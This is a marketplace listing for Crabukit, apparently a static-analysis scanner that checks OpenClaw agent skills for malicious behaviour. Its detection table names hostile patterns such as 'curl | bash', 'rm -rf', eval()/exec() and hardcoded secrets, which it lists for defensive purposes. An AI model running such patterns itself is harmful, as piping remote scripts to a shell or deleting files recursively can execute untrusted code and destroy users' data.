✓ Verified 💻 Development ✓ Enhanced Data

Crabukit

Security scanner for OpenClaw skills with Clawdex integration.

Rating
5 (252 reviews)
Downloads
6,557 downloads
Version
1.0.0

Overview

Security scanner for OpenClaw skills with Clawdex integration.

Complete Documentation

View Source →

🔒 Crabukit

Security scanner for OpenClaw skills. Prevents installation of malicious or vulnerable skills by static analysis. Integrates with Clawdex for comprehensive protection.

Quick Start

bash
# Safely install a skill (scans before installing)
crabukit install youtube-summarize

# Scan a local skill before installing
crabukit scan ./suspicious-skill/

# Scan an installed skill
crabukit scan /opt/homebrew/lib/node_modules/clawdbot/skills/unknown-skill

# CI mode - fail on high severity or above
crabukit scan ./my-skill --fail-on=high

# List all detection rules
crabukit list-rules

🔌 Clawdex Integration

Crabukit automatically integrates with Clawdex if installed:

bash
# Install Clawdex for database-based protection
clawdhub install clawdex

# Now crabukit will:
# 1. Check Clawdex database (known 824+ malicious skills)
# 2. Run behavior analysis (zero-day detection)
# → Defense in depth!

Layered Protection:

  • Clawdex: Database of known-bad skills (fast lookup)
  • Crabukit: Behavior analysis for zero-days (static analysis)

What It Detects

CategoryIssues
External DBKnown malicious skills (via Clawdex)
SecretsHardcoded API keys, private keys, passwords
Code Injectioneval(), exec(), subprocess(shell=True)
Shell Riskscurl \bash, rm -rf, unquoted variables
PermissionsDangerous tool requests without safety guidance
MetadataSuspicious patterns in SKILL.md descriptions

Risk Scoring

Crabukit assigns a score (0-100) based on findings:

ScoreLevelAction
0CleanSafe to install
1-9LowMinor issues
10-24MediumReview findings
25-49HighCareful review required
50+CriticalDo not install

Exit Codes

  • 0 - Scan completed, no findings at or above --fail-on threshold
  • 1 - Findings at or above threshold detected

CI/CD Integration

yaml
# .github/workflows/security.yml
- name: Scan skill
  run: |
    pip install crabukit
    crabukit scan ./my-skill --fail-on=medium

Installation

bash
# Via ClawdHub (when published)
clawdhub install crabukit

# Or via pip
pip install crabukit

# Or from source
git clone https://github.com/tnbradley/crabukit.git
cd crabukit
pip install -e .

Installation

Terminal bash 

openclaw install crabukit
Copied!

💻Code Examples

crabukit list-rules

crabukit-list-rules.txt
## 🔌 Clawdex Integration

Crabukit **automatically integrates with Clawdex** if installed:

# → Defense in depth!

--defense-in-depth.txt
**Layered Protection:**
- **Clawdex**: Database of known-bad skills (fast lookup)
- **Crabukit**: Behavior analysis for zero-days (static analysis)

## What It Detects

| Category | Issues |
|----------|--------|
| **External DB** | Known malicious skills (via Clawdex) |
| **Secrets** | Hardcoded API keys, private keys, passwords |
| **Code Injection** | `eval()`, `exec()`, `subprocess(shell=True)` |
| **Shell Risks** | `curl \| bash`, `rm -rf`, unquoted variables |
| **Permissions** | Dangerous tool requests without safety guidance |
| **Metadata** | Suspicious patterns in SKILL.md descriptions |

## Risk Scoring

Crabukit assigns a score (0-100) based on findings:

| Score | Level | Action |
|-------|-------|--------|
| 0 | Clean | Safe to install |
| 1-9 | Low | Minor issues |
| 10-24 | Medium | Review findings |
| 25-49 | High | Careful review required |
| 50+ | Critical | Do not install |

## Exit Codes

- `0` - Scan completed, no findings at or above `--fail-on` threshold
- `1` - Findings at or above threshold detected

## CI/CD Integration
example.sh
# Safely install a skill (scans before installing)
crabukit install youtube-summarize

# Scan a local skill before installing
crabukit scan ./suspicious-skill/

# Scan an installed skill
crabukit scan /opt/homebrew/lib/node_modules/clawdbot/skills/unknown-skill

# CI mode - fail on high severity or above
crabukit scan ./my-skill --fail-on=high

# List all detection rules
crabukit list-rules
example.sh
# Install Clawdex for database-based protection
clawdhub install clawdex

# Now crabukit will:
# 1. Check Clawdex database (known 824+ malicious skills)
# 2. Run behavior analysis (zero-day detection)
# → Defense in depth!
example.yml
# .github/workflows/security.yml
- name: Scan skill
  run: |
    pip install crabukit
    crabukit scan ./my-skill --fail-on=medium
example.sh
# Via ClawdHub (when published)
clawdhub install crabukit

# Or via pip
pip install crabukit

# Or from source
git clone https://github.com/tnbradley/crabukit.git
cd crabukit
pip install -e .

Tags

#coding_agents-and-ides #integration #security

Quick Info

Category Development
Model Claude 3.5
Complexity One-Click
Author tnbradley
Last Updated 3/10/2026
🚀
Optimized for
Claude 3.5
🧠

Ready to Install?

Get started with this skill in seconds

openclaw install crabukit

Resources

📂
OpenClaw Skills
View on OpenClaw GitHub

Related Skills

✓ Verified 💻 Development

4claw

4claw — a moderated imageboard for AI agents.

🧠 Claude-Ready #ai_and-llms
)}
4.4 (118)
4,990
v1.0.0
✓ Verified 💻 Development

Aap Passport

Agent Attestation Protocol - The Reverse Turing Test.

🧠 Claude-Ready #ai_and-llms
)}
4.3 (89)
4,621
v1.0.0
✓ Verified 💻 Development

Acestep Lyrics Transcription

Transcribe audio to timestamped lyrics using OpenAI Whisper or ElevenLabs Scribe API.

GPT-Optimized #ai_and-llms #api #script
)}
3.8 (274)
17,648
v1.0.0
✓ Verified 💻 Development

Adaptive Suite

A continuously adaptive skill suite that empowers Clawdbot.

🧠 Claude-Ready #ai_and-llms #bot
)}
4.7 (88)
1,625
v1.0.0